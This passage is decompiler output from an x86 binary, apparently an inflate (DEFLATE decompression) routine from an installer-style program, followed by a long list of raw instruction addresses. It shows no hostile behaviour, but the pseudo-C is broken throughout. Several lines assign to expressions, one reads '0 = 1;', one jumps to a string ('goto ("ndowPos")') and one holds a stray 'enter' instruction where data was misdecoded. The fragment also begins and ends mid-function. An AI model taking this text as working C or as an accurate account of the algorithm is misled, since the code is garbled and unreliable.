                											while(1) {
                												L116:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L114:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L115:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L117:
                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - __eax;
                											__eflags = __ebx;
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[6];
                											__esi[2] = __esi[6];
                											 *__esi = 3;
                											goto L118;
                										case 3:
                											L118:
                											__eax = __esi[3];
                											while(1) {
                												L121:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L119:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L120:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L122:
                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __cl & 0x00000010;
                											if((__cl & 0x00000010) == 0) {
                												L124:
                												__eflags = __cl & 0x00000040;
                												if((__cl & 0x00000040) != 0) {
                													goto L9;
                												}
                												L125:
                												__esi[3] = __ecx;
                												__ecx =  *(__eax + 2) & 0x0000ffff;
                												__esi[2] = __eax;
                												goto L157;
                											}
                											L123:
                											__esi[2] = __ecx;
                											__esi[3] = __eax;
                											 *__esi = 4;
                											goto L157;
                										case 4:
                											L126:
                											__eax = __esi[2];
                											while(1) {
                												L129:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L127:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L128:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L130:
                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                											__ecx = __eax;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__eflags = __ebx;
                											 *__esi = 5;
                											goto L131;
                										case 5:
                											L131:
                											__eax =  *(__ebp - 0x30);
                											__edx = __esi[3];
                											_push(__esi);
                											__al = __al | 0x0000008b;
                											asm("enter 0xce2b, 0x81");
                											goto ("ndowPos");
                										case 6:
                											L133:
                											__eax =  *(__ebp - 0x2c);
                											__edi =  *(__ebp - 0x30);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L149:
                												__cl = __esi[2];
                												 *__edi = __cl;
                												__edi = __edi + 1;
                												__eax = __eax - 1;
                												 *(__ebp - 0x30) = __edi;
                												 *(__ebp - 0x2c) = __eax;
                												goto L23;
                											}
                											L134:
                											__ecx = __esi[0x26e8];
                											__eflags = __edi - __ecx;
                											if(__edi != __ecx) {
                												L140:
                												__esi[0x26ea] = __edi;
                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                												__edi = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edi - __ecx;
                												 *(__ebp - 0x30) = __edi;
                												if(__edi >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edi;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edi;
                													__eax = __ecx - __edi - 1;
                												}
                												__edx = __esi[0x26e8];
                												__eflags = __edi - __edx;
                												 *(__ebp - 8) = __edx;
                												if(__edi == __edx) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __ecx - __edx;
                													if(__ecx != __edx) {
                														__edi = __edx;
                														__eflags = __edi - __ecx;
                														 *(__ebp - 0x30) = __edi;
                														if(__edi >= __ecx) {
                															__eax =  *(__ebp - 8);
                															__eax =  *(__ebp - 8) - __edi;
                															__eflags = __eax;
                														} else {
                															__ecx = __ecx - __edi;
                															__eax = __ecx;
                														}
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L160;
                												} else {
                													goto L149;
                												}
                											}
                											L135:
                											__eax = __esi[0x26e9];
                											__edx =  &(__esi[0x6e8]);
                											__eflags = __eax - __edx;
                											if(__eax == __edx) {
                												goto L140;
                											}
                											L136:
                											__edi = __edx;
                											__eflags = __edi - __eax;
                											if(__edi >= __eax) {
                												__ecx = __ecx - __edi;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edi;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L149;
                											} else {
                												goto L140;
                											}
                										case 7:
                											L150:
                											__eflags = __ebx - 7;
                											if(__ebx > 7) {
                												__ebx = __ebx - 8;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                												_t351 = __ebp - 0x38;
                												 *_t351 =  *(__ebp - 0x38) - 1;
                												__eflags =  *_t351;
                											}
                											goto L152;
                										case 8:
                											L4:
                											while(_t396 < 3) {
                												if( *(_t419 - 0x34) == 0) {
                													goto L159;
                												} else {
                													 *(_t419 - 0x34) =  *(_t419 - 0x34) - 1;
                													 *(_t419 - 0x40) =  *(_t419 - 0x40) | ( *( *(_t419 - 0x38)) & 0x000000ff) << _t396;
                													 *(_t419 - 0x38) =  &(( *(_t419 - 0x38))[1]);
                													_t396 = _t396 + 8;
                													continue;
                												}
                											}
                											_t396 = _t396 - 3;
                											 *(_t419 - 0x40) =  *(_t419 - 0x40) >> 3;
                											_t377 =  *(_t419 - 0x40) & 0x00000007;
                											asm("sbb ecx, ecx");
                											_t379 = _t377 >> 1;
                											_t417[0x145] = ( ~(_t377 & 0x00000001) & 0x00000007) + 8;
                											if(_t379 == 0) {
                												L24:
                												 *_t417 = 9;
                												_t407 = _t396 & 0x00000007;
                												 *(_t419 - 0x40) =  *(_t419 - 0x40) >> _t407;
                												_t396 = _t396 - _t407;
                												goto L157;
                											}
                											L6:
                											_t382 = _t379 - 1;
                											if(_t382 == 0) {
                												L13:
                												__eflags =  *0x432e90;
                												if( *0x432e90 != 0) {
                													L22:
                													_t383 =  *0x40a5e8; // 0x9
                													_t417[4] = _t383;
                													_t384 =  *0x40a5ec; // 0x5
                													_t417[4] = _t384;
                													_t385 =  *0x431d0c; // 0x0
                													_t417[5] = _t385;
                													_t386 =  *0x431d08; // 0x0
                													_t417[6] = _t386;
                													L23:
                													 *_t417 =  *_t417 & 0x00000000;
                													goto L157;
                												} else {
                													_t26 = _t419 - 8;
                													 *_t26 =  *(_t419 - 8) & 0x00000000;
                													__eflags =  *_t26;
                													_t387 = 0x431d10;
                													do {
                														L15:
                														__eflags = _t387 - 0x431f4c;
                														_t409 = 8;
                														if(_t387 > 0x431f4c) {
                															__eflags = _t387 - 0x432110;
                															if(_t387 >= 0x432110) {
                																__eflags = _t387 - 0x432170;
                																if(_t387 < 0x432170) {
                																	_t409 = 7;
                																}
                															} else {
                																_t409 = 9;
                															}
                														}
                														L20:
                														 *_t387 = _t409;
                														_t387 = _t387 + 4;
                														__eflags = _t387 - 0x432190;
                													} while (_t387 < 0x432190);
                													E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t419 - 8);
                													_push(0x1e);
                													_pop(_t411);
                													_push(5);
                													_pop(_t390);
                													memset(0x431d10, _t390, _t411 << 2);
                													_t421 = _t421 + 0xc;
                													_t413 = 0x431d10 + _t411;
                													E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t419 - 8);
                													 *0x432e90 =  *0x432e90 + 1;
                													__eflags =  *0x432e90;
                													goto L22;
                												}
                											}
                											L7:
                											_t394 = _t382 - 1;
                											if(_t394 == 0) {
                												 *_t417 = 0xb;
                												goto L157;
                											}
                											L8:
                											if(_t394 != 1) {
                												goto L157;
                											}
                											goto L9;
                										case 9:
                											while(1) {
                												L27:
                												__eflags = __ebx - 0x20;
                												if(__ebx >= 0x20) {
                													break;
                												}
                												L25:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L26:
                												__eax =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__ecx = __ebx;
                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L28:
                											__eax =  *(__ebp - 0x40);
                											__ebx = 0;
                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                											 *(__ebp - 0x40) = 0;
                											__eflags = __eax;
                											__esi[1] = __eax;
                											if(__eax == 0) {
                												goto L53;
                											}
                											L29:
                											_push(0xa);
                											_pop(__eax);
                											goto L54;
                										case 0xa:
                											L30:
                											__eflags =  *(__ebp - 0x34);
                											if( *(__ebp - 0x34) == 0) {
                												goto L159;
                											}
                											L31:
                											__eax =  *(__ebp - 0x2c);
                											__eflags = __eax;
                											if(__eax != 0) {
                												L48:
                												__eflags = __eax -  *(__ebp - 0x34);
                												if(__eax >=  *(__ebp - 0x34)) {
                													__eax =  *(__ebp - 0x34);
                												}
                												__ecx = __esi[1];
                												__eflags = __ecx - __eax;
                												__edi = __ecx;
                												if(__ecx >= __eax) {
                													__edi = __eax;
                												}
                												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                												_t80 =  &(__esi[1]);
                												 *_t80 = __esi[1] - __edi;
                												__eflags =  *_t80;
                												if( *_t80 == 0) {
                													L53:
                													__eax = __esi[0x145];
                													L54:
                													 *__esi = __eax;
                												}
                												goto L157;
                											}
                											L32:
                											__ecx = __esi[0x26e8];
                											__edx =  *(__ebp - 0x30);
                											__eflags = __edx - __ecx;
                											if(__edx != __ecx) {
                												L38:
                												__esi[0x26ea] = __edx;
                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                												__edx = __esi[0x26ea];
                												__ecx = __esi[0x26e9];
                												__eflags = __edx - __ecx;
                												 *(__ebp - 0x30) = __edx;
                												if(__edx >= __ecx) {
                													__eax = __esi[0x26e8];
                													__eax = __esi[0x26e8] - __edx;
                													__eflags = __eax;
                												} else {
                													__ecx = __ecx - __edx;
                													__eax = __ecx - __edx - 1;
                												}
                												__edi = __esi[0x26e8];
                												 *(__ebp - 0x2c) = __eax;
                												__eflags = __edx - __edi;
                												if(__edx == __edi) {
                													__edx =  &(__esi[0x6e8]);
                													__eflags = __edx - __ecx;
                													if(__eflags != 0) {
                														 *(__ebp - 0x30) = __edx;
                														if(__eflags >= 0) {
                															__edi = __edi - __edx;
                															__eflags = __edi;
                															__eax = __edi;
                														} else {
                															__ecx = __ecx - __edx;
                															__eax = __ecx;
                														}
                														 *(__ebp - 0x2c) = __eax;
                													}
                												}
                												__eflags = __eax;
                												if(__eax == 0) {
                													goto L160;
                												} else {
                													goto L48;
                												}
                											}
                											L33:
                											__eax = __esi[0x26e9];
                											__edi =  &(__esi[0x6e8]);
                											__eflags = __eax - __edi;
                											if(__eax == __edi) {
                												goto L38;
                											}
                											L34:
                											__edx = __edi;
                											__eflags = __edx - __eax;
                											 *(__ebp - 0x30) = __edx;
                											if(__edx >= __eax) {
                												__ecx = __ecx - __edx;
                												__eflags = __ecx;
                												__eax = __ecx;
                											} else {
                												__eax = __eax - __edx;
                												__eax = __eax - 1;
                											}
                											__eflags = __eax;
                											 *(__ebp - 0x2c) = __eax;
                											if(__eax != 0) {
                												goto L48;
                											} else {
                												goto L38;
                											}
                										case 0xb:
                											goto L56;
                										case 0xc:
                											L60:
                											__esi[1] = __esi[1] >> 0xa;
                											__eax = (__esi[1] >> 0xa) + 4;
                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                												goto L68;
                											}
                											goto L61;
                										case 0xd:
                											while(1) {
                												L93:
                												__eax = __esi[1];
                												__ecx = __esi[2];
                												__edx = __eax;
                												__eax = __eax & 0x0000001f;
                												__edx = __edx >> 5;
                												__eax = __edx + __eax + 0x102;
                												__eflags = __esi[2] - __eax;
                												if(__esi[2] >= __eax) {
                													break;
                												}
                												L73:
                												__eax = __esi[0x143];
                												while(1) {
                													L76:
                													__eflags = __ebx - __eax;
                													if(__ebx >= __eax) {
                														break;
                													}
                													L74:
                													__eflags =  *(__ebp - 0x34);
                													if( *(__ebp - 0x34) == 0) {
                														goto L159;
                													}
                													L75:
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                													__ecx = __ebx;
                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                													__ebx = __ebx + 8;
                													__eflags = __ebx;
                												}
                												L77:
                												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                												__eax = __eax &  *(__ebp - 0x40);
                												__ecx = __esi[0x144];
                												__eax = __esi[0x144] + __eax * 4;
                												__edx =  *(__eax + 1) & 0x000000ff;
                												__eax =  *(__eax + 2) & 0x0000ffff;
                												__eflags = __eax - 0x10;
                												 *(__ebp - 0x14) = __eax;
                												if(__eax >= 0x10) {
                													L79:
                													__eflags = __eax - 0x12;
                													if(__eax != 0x12) {
                														__eax = __eax + 0xfffffff2;
                														 *(__ebp - 8) = 3;
                													} else {
                														_push(7);
                														 *(__ebp - 8) = 0xb;
                														_pop(__eax);
                													}
                													while(1) {
                														L84:
                														__ecx = __eax + __edx;
                														__eflags = __ebx - __eax + __edx;
                														if(__ebx >= __eax + __edx) {
                															break;
                														}
                														L82:
                														__eflags =  *(__ebp - 0x34);
                														if( *(__ebp - 0x34) == 0) {
                															goto L159;
                														}
                														L83:
                														__ecx =  *(__ebp - 0x38);
                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                														__ecx = __ebx;
                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                														__ebx = __ebx + 8;
                														__eflags = __ebx;
                													}
                													L85:
                													__ecx = __edx;
                													__ebx = __ebx - __edx;
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                													__edx =  *(__ebp - 8);
                													__ebx = __ebx - __eax;
                													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                													__ecx = __eax;
                													__eax = __esi[1];
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                													__ecx = __esi[2];
                													__eax = __eax >> 5;
                													__edi = __eax >> 0x00000005 & 0x0000001f;
                													__eax = __eax & 0x0000001f;
                													__eax = __edi + __eax + 0x102;
                													__edi = __edx + __ecx;
                													__eflags = __edx + __ecx - __eax;
                													if(__edx + __ecx > __eax) {
                														goto L9;
                													}
                													L86:
                													__eflags =  *(__ebp - 0x14) - 0x10;
                													if( *(__ebp - 0x14) != 0x10) {
                														L89:
                														__edi = 0;
                														__eflags = 0;
                														L90:
                														__eax = __esi + 0xc + __ecx * 4;
                														do {
                															L91:
                															 *__eax = __edi;
                															__ecx = __ecx + 1;
                															__eax = __eax + 4;
                															__edx = __edx - 1;
                															__eflags = __edx;
                														} while (__edx != 0);
                														__esi[2] = __ecx;
                														continue;
                													}
                													L87:
                													__eflags = __ecx - 1;
                													if(__ecx < 1) {
                														goto L9;
                													}
                													L88:
                													__edi =  *(__esi + 8 + __ecx * 4);
                													goto L90;
                												}
                												L78:
                												__ecx = __edx;
                												__ebx = __ebx - __edx;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                												__ecx = __esi[2];
                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                												__esi[2] = __esi[2] + 1;
                											}
                											L94:
                											__eax = __esi[1];
                											__esi[0x144] = __esi[0x144] & 0x00000000;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                											__edi = __eax;
                											__eax = __eax >> 5;
                											__edi = __edi & 0x0000001f;
                											__ecx = 0x101;
                											__eax = __eax & 0x0000001f;
                											__edi = __edi + 0x101;
                											__eax = __eax + 1;
                											__edx = __ebp - 0xc;
                											 *(__ebp - 0x14) = __eax;
                											 &(__esi[0x148]) = __ebp - 4;
                											 *(__ebp - 4) = 9;
                											__ebp - 0x18 =  &(__esi[3]);
                											 *(__ebp - 0x10) = 6;
                											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                											__eflags =  *(__ebp - 4);
                											if( *(__ebp - 4) == 0) {
                												__eax = __eax | 0xffffffff;
                												__eflags = __eax;
                											}
                											__eflags = __eax;
                											if(__eax != 0) {
                												goto L9;
                											} else {
                												L97:
                												__ebp - 0xc =  &(__esi[0x148]);
                												__ebp - 0x10 = __ebp - 0x1c;
                												__eax = __esi + 0xc + __edi * 4;
                												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                												__eflags = __eax;
                												if(__eax != 0) {
                													goto L9;
                												}
                												L98:
                												__eax =  *(__ebp - 0x10);
                												__eflags =  *(__ebp - 0x10);
                												if( *(__ebp - 0x10) != 0) {
                													L100:
                													__cl =  *(__ebp - 4);
                													 *__esi =  *__esi & 0x00000000;
                													__eflags =  *__esi;
                													__esi[4] = __al;
                													__eax =  *(__ebp - 0x18);
                													__esi[5] =  *(__ebp - 0x18);
                													__eax =  *(__ebp - 0x1c);
                													__esi[4] = __cl;
                													__esi[6] =  *(__ebp - 0x1c);
                													goto L101;
                												}
                												L99:
                												__eflags = __edi - 0x101;
                												if(__edi > 0x101) {
                													goto L9;
                												}
                												goto L100;
                											}
                										case 0xe:
                											goto L9;
                										case 0xf:
                											L152:
                											__eax =  *(__ebp - 0x30);
                											__esi[0x26ea] =  *(__ebp - 0x30);
                											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                											__ecx = __esi[0x26ea];
                											__edx = __esi[0x26e9];
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x30) = __ecx;
                											if(__ecx >= __edx) {
                												__eax = __esi[0x26e8];
                												__eax = __esi[0x26e8] - __ecx;
                												__eflags = __eax;
                											} else {
                												__edx = __edx - __ecx;
                												__eax = __edx - __ecx - 1;
                											}
                											__eflags = __ecx - __edx;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ecx != __edx) {
                												L160:
                												__edi = 0;
                												goto L10;
                											} else {
                												L156:
                												__eax = __esi[0x145];
                												__eflags = __eax - 8;
                												 *__esi = __eax;
                												if(__eax != 8) {
                													L161:
                													0 = 1;
                													goto L10;
                												}
                												goto L157;
                											}
                									}
                								}
                								L158:
                								goto L9;
                							}
                							L70:
                							if( *__edi == __eax) {
                								goto L72;
                							}
                							L71:
                							__esi[2] = __esi[2] & __eax;
                							 *__esi = 0xd;
                							goto L93;
                						}
                					}
                				}
                				L159:
                				_t414 = 0;
                				_t417[0x147] =  *(_t419 - 0x40);
                				_t417[0x146] = _t396;
                				( *(_t419 + 8))[1] = 0;
                				goto L11;
                			}









                0x00406d85
                0x00406d85
                0x00406d85
                0x00406d85
                0x00406d85
                0x00406d89
                0x00000000
                0x00000000
                0x00406d8f
                0x00406d8f
                0x00406d92
                0x00406d95
                0x00406d9a
                0x00406d9c
                0x00406d9f
                0x00406da2
                0x00406da5
                0x00406da5
                0x00406da8
                0x00000000
                0x00000000
                0x00406daa
                0x00406daa
                0x00406dad
                0x00406db2
                0x00406db4
                0x00406db7
                0x00406dbd
                0x00406b1c
                0x00406b1c
                0x00406b1f
                0x00406b25
                0x00406b2b
                0x00406b34
                0x00406b3a
                0x00406b3d
                0x00406b44
                0x00406b49
                0x00406b4f
                0x00406b5a
                0x00406b5a
                0x00406dc3
                0x00406dc3
                0x00406dcd
                0x00000000
                0x00000000
                0x00406dd3
                0x00406dd3
                0x00406dd7
                0x00406dda
                0x00406dda
                0x00406dde
                0x00406de4
                0x00406de4
                0x00406de7
                0x00406dea
                0x00406df0
                0x00000000
                0x00000000
                0x00406df2
                0x00406e14
                0x00406e14
                0x00406e17
                0x00000000
                0x00000000
                0x00406df4
                0x00406df8
                0x00000000
                0x00000000
                0x00406dfe
                0x00406dfe
                0x00406e01
                0x00406e04
                0x00406e09
                0x00406e0b
                0x00406e0e
                0x00406e11
                0x00406e11
                0x00406e19
                0x00406e19
                0x00406e1f
                0x00406e22
                0x00406e25
                0x00406e25
                0x00406e2c
                0x00406e30
                0x00406e34
                0x00406e37
                0x00406e3a
                0x00406e40
                0x00406e45
                0x00000000
                0x00000000
                0x00406e47
                0x00406e5b
                0x00406e5b
                0x00406e5f
                0x00000000
                0x00000000
                0x00406e49
                0x00406e4c
                0x00406e4c
                0x00406e53
                0x00406e58
                0x00406e58
                0x00406e58
                0x00406e61
                0x00406e61
                0x00406e64
                0x00406e72
                0x00406e78
                0x00406e7d
                0x00406e83
                0x00406e89
                0x00406e8f
                0x00406e96
                0x00406eaa
                0x00406eaa
                0x00407479
                0x00407479
                0x00407479
                0x0040747e
                0x00000000
                0x00000000
                0x00406ab6
                0x00406ab6
                0x00000000
                0x004070b1
                0x004070b1
                0x004070b5
                0x004070b8
                0x004070bb
                0x004070be
                0x00000000
                0x00000000
                0x004070c4
                0x004070c4
                0x004070e9
                0x004070e9
                0x004070e9
                0x004070eb
                0x00000000
                0x00000000
                0x004070c9
                0x004070c9
                0x004070cd
                0x00000000
                0x00000000
                0x004070d3
                0x004070d3
                0x004070d6
                0x004070d9
                0x004070dc
                0x004070de
                0x004070e0
                0x004070e3
                0x004070e6
                0x004070e6
                0x004070e6
                0x004070ed
                0x004070ed
                0x004070f5
                0x004070f8
                0x004070fb
                0x004070fe
                0x00407102
                0x00407105
                0x00407107
                0x0040710a
                0x0040710c
                0x00407120
                0x00407120
                0x00407123
                0x0040713d
                0x0040713d
                0x00407140
                0x00000000
                0x00000000
                0x00407146
                0x00407146
                0x00407149
                0x00000000
                0x00000000
                0x0040714f
                0x0040714f
                0x00000000
                0x0040714f
                0x00407125
                0x00407128
                0x0040712f
                0x00407132
                0x00000000
                0x00407132
                0x0040710e
                0x00407112
                0x00407115
                0x00000000
                0x00000000
                0x0040715a
                0x0040715a
                0x0040717f
                0x0040717f
                0x0040717f
                0x00407181
                0x00000000
                0x00000000
                0x0040715f
                0x0040715f
                0x00407163
                0x00000000
                0x00000000
                0x00407169
                0x00407169
                0x0040716c
                0x0040716f
                0x00407172
                0x00407174
                0x00407176
                0x00407179
                0x0040717c
                0x0040717c
                0x0040717c
                0x00407183
                0x0040718b
                0x0040718e
                0x00407191
                0x00407193
                0x00407196
                0x00407196
                0x00407198
                0x0040719c
                0x0040719f
                0x004071a2
                0x004071a5
                0x00000000
                0x00000000
                0x004071ab
                0x004071ab
                0x004071d0
                0x004071d0
                0x004071d0
                0x004071d2
                0x00000000
                0x00000000
                0x004071b0
                0x004071b0
                0x004071b4
                0x00000000
                0x00000000
                0x004071ba
                0x004071ba
                0x004071bd
                0x004071c0
                0x004071c3
                0x004071c5
                0x004071c7
                0x004071ca
                0x004071cd
                0x004071cd
                0x004071cd
                0x004071d4
                0x004071d4
                0x004071dc
                0x004071df
                0x004071e2
                0x004071e5
                0x004071e9
                0x004071ec
                0x004071ee
                0x004071f1
                0x004071f4
                0x0040720e
                0x0040720e
                0x00407211
                0x00000000
                0x00000000
                0x00407217
                0x00407217
                0x0040721a
                0x00407221
                0x00000000
                0x00407221
                0x004071f6
                0x004071f9
                0x00407200
                0x00407203
                0x00000000
                0x00000000
                0x00407229
                0x00407229
                0x0040724e
                0x0040724e
                0x0040724e
                0x00407250
                0x00000000
                0x00000000
                0x0040722e
                0x0040722e
                0x00407232
                0x00000000
                0x00000000
                0x00407238
                0x00407238
                0x0040723b
                0x0040723e
                0x00407241
                0x00407243
                0x00407245
                0x00407248
                0x0040724b
                0x0040724b
                0x0040724b
                0x00407252
                0x0040725a
                0x0040725d
                0x00407260
                0x00407262
                0x00407265
                0x00407267
                0x00000000
                0x00000000
                0x0040726d
                0x0040726d
                0x00407270
                0x00407271
                0x00407272
                0x00407274
                0x00407278
                0x00000000
                0x00407373
                0x00407373
                0x00407376
                0x00407379
                0x0040737b
                0x00407412
                0x00407412
                0x00407415
                0x00407417
                0x00407418
                0x00407419
                0x0040741c
                0x00000000
                0x0040741c
                0x00407381
                0x00407381
                0x00407387
                0x00407389
                0x004073ae
                0x004073b1
                0x004073b7
                0x004073bc
                0x004073c2
                0x004073c8
                0x004073ca
                0x004073cd
                0x004073d6
                0x004073dc
                0x004073dc
                0x004073cf
                0x004073d1
                0x004073d3
                0x004073d3
                0x004073de
                0x004073e4
                0x004073e6
                0x004073e9
                0x004073eb
                0x004073f1
                0x004073f3
                0x004073f5
                0x004073f7
                0x004073f9
                0x004073fc
                0x00407405
                0x00407408
                0x00407408
                0x004073fe
                0x004073fe
                0x00407401
                0x00407401
                0x004073fc
                0x004073f3
                0x0040740a
                0x0040740c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040740c
                0x0040738b
                0x0040738b
                0x00407391
                0x00407397
                0x00407399
                0x00000000
                0x00000000
                0x0040739b
                0x0040739b
                0x0040739d
                0x0040739f
                0x004073a6
                0x004073a6
                0x004073a8
                0x004073a1
                0x004073a1
                0x004073a3
                0x004073a3
                0x004073aa
                0x004073ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00407424
                0x00407424
                0x00407427
                0x00407429
                0x0040742c
                0x0040742f
                0x0040742f
                0x0040742f
                0x0040742f
                0x00000000
                0x00000000
                0x00000000
                0x00406add
                0x00406ac1
                0x00000000
                0x00406ac7
                0x00406aca
                0x00406ad4
                0x00406ad7
                0x00406ada
                0x00000000
                0x00406ada
                0x00406ac1
                0x00406ae5
                0x00406ae8
                0x00406aec
                0x00406af6
                0x00406b00
                0x00406b03
                0x00406b09
                0x00406c3d
                0x00406c3f
                0x00406c45
                0x00406c48
                0x00406c4b
                0x00000000
                0x00406c4b
                0x00406b0f
                0x00406b0f
                0x00406b10
                0x00406b68
                0x00406b68
                0x00406b6f
                0x00406c15
                0x00406c15
                0x00406c1a
                0x00406c1d
                0x00406c22
                0x00406c25
                0x00406c2a
                0x00406c2d
                0x00406c32
                0x00406c35
                0x00406c35
                0x00000000
                0x00406b75
                0x00406b75
                0x00406b75
                0x00406b75
                0x00406b79
                0x00406b7e
                0x00406b7e
                0x00406b7e
